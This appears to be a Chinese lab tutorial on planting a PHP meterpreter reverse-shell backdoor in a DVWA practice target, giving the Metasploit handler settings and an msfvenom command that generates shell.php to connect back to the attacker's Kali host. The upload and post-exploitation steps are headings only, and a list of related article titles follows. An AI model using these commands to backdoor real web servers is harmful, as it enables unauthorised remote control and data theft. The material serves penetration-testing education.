PHP后门反弹连接DVWA
PHP后门反弹连接DVWA
- 环境准备
- 操作系统准备
- DVWA靶场准备
- metasploit配置监控及攻击载荷
- 配置监控
- 配置攻击载荷
- 生成php后门
- 上传后门文件
- 后渗透获取数据库信息
环境准备
操作系统准备
kali : 192.168.202.133
win10:192.168.202.139
DVWA靶场准备
DVWA下载
注意:配置DVWA环境 准备PHP7.0以上,和 Nginx环境
设置网站
配置数据库密码
与数据库设置保持一致
metasploit配置监控及攻击载荷
配置监控
使用handler模块
use exploit/multi/handler
配置攻击载荷
第一步设置payload
set payload php/meterpreter/reverse_tcp
第二步设置 lhost 和 lport
set lhost xxxip ;
set lport xxx端口;
生成php后门
执行攻击获得meterpreter
新建一个终端在终端内输入
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.202.133 lport=4664 R>shell.php
上传后门文件
使用Python简单的web服务,把后门文件下载到WIN10
访问该木马文件
后渗透获取数据库信息
PHP后门反弹连接DVWA相关推荐
- 木马病毒隐身穿墙术解密之文件注入和反弹连接
作者: 刘源 比特网 2010-04-01 12:05:08 木马病毒隐身穿墙术解密之文件注入和反弹连接 对于木马病毒当前所使用的隐身和穿墙术,到这篇已经是第三篇了,虽然每篇的篇幅都不是很长,但每篇都 ...
- metasploit完整的使用流程包括meterpreter后渗透
metasploit完整的使用流程包括meterpreter后渗透 主机发现 基于ARP发现内网存活主机 基于FTP服务 基于HTTP服务 基于SMB 漏洞扫描 漏洞渗透利用 利用ms17_010 利 ...
- 【技术分享】linux各种一句话反弹shell总结——攻击者指定服务端,受害者主机(无公网IP)主动连接攻击者的服务端程序(CC server),开启一个shell交互,就叫反弹shell。...
反弹shell背景: 想要搞清楚这个问题,首先要搞清楚什么是反弹,为什么要反弹. 假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常 ...
- 2018-2019-2 20165315 《网络对抗技术》Exp2+ 后门进阶
2018-2019-2 20165315 <网络对抗技术>Exp2+ 后门进阶 一.实验要求 以下三个课题三选一 1.其他专用后门工具研究(CROSSRAT ...) 2.恶意代码绑定技术 ...
- #20155235 《网络攻防》 实验二 后门原理与实践
20155235 <网络攻防> 实验二 后门原理与实践 实验目的 建立一个后门连接是如此的简单,功能又如此强大.通过亲手实践并了解这一事实,从而提高自己的安全意识 . 实验内容 (1)使用 ...
- 2018-2019-2 《网络对抗技术》Exp2 后门原理与应用 20165211
目录 后门原理与应用 实验内容 基础问题回答 常用后门工具 Netcat Socat MSFmeterpreter 实践过程记录 1.后门工具熟悉 2.使用netcat获取主机操作Shell,cron ...
- Exp2 后门原理与实践 20164323段钊阳
220164323 Exp2 后门原理与实践 (1)例举你能想到的一个后门进入到你系统中的可能方式? 在使用盗版软件,盗版系统,甚至游戏外挂时,往往会让我们关闭杀毒软件,. (2)例举你知道的后门如何 ...
- 2018-2019 Exp2 后门原理与实践
2018-2019 Exp2 后门原理与实践 目录 一.实验内容说明及基础问题回答 二.工具准备 查看WindowsIP和LinuxIP Windows获得Linuxshell Linux 获得Win ...
- 2018-2019-2 网络对抗技术 20165328 Exp2 后门原理与实践
实验内容: 任务一:使用netcat获取主机操作Shell,cron启动 任务二:使用socat获取主机操作Shell, 任务计划启动 任务三:使用MSF meterpreter(或其他软件)生成可执 ...
最新文章
- JS 实现下载Blod文件
- tensorflow GPU 内存不够
- css选择器匹配没有属性x的元素[重复]
- 大脑构造图与功能解析_锻炼改变大脑
- 【量化投资】策略四(聚宽)
- 【CyberSecurityLearning 63】CSRF攻击
- 小度智能音箱维修点_智能音箱哪个好?小度 小爱 天猫 评测
- WebStorm Vue ElementUI
- linux查看端口所占用的进程号
- leetcode54:螺旋矩阵
- 工作109:路由菜单项
- Eigen 简明教程之如何从Python转到Eigen
- MongoDB在windows下安装和配置
- linux ip地址本地缓存,ip-address – 如何解析组织的IP地址(使用缓存)
- java 命令行运行 打包 IDEA
- html5通讯录模板,[应用模板]HTML5+Phonegap通讯录
- 如何使用smobiler的listview控件实现个人信息修改
- 关于物联网卡禁区和死卡问题的最全解释
- 基于 Verilog 的经典数字电路设计(3)选择器
- 加密邮箱的数字签名和加密原理
热门文章
- c++ primer plus 6.11第四题 加入Benevolent Order of Programmer后,
- 2023年重庆大学中国语言文学考研考情与难度、参考书及前辈经验
- 中国宠物用品品牌“Touchdog它它”完成数千万元Pre-A 轮融资
- SAS——编程——数学
- Kaptcha工具和手动实现验证码功能
- C语言字符串输入与输出函数
- 加油站涉税数据管理云平台
- 四旋翼动力学和仿真翻译(Quadcopter Dynamics and Simulation)
- 一名优秀的Web前端开发工程师的成长之路:如何学习前端开发知识以及书籍推荐
- 【腾讯开放平台】Android、IOS实现指定QQ临时会话功能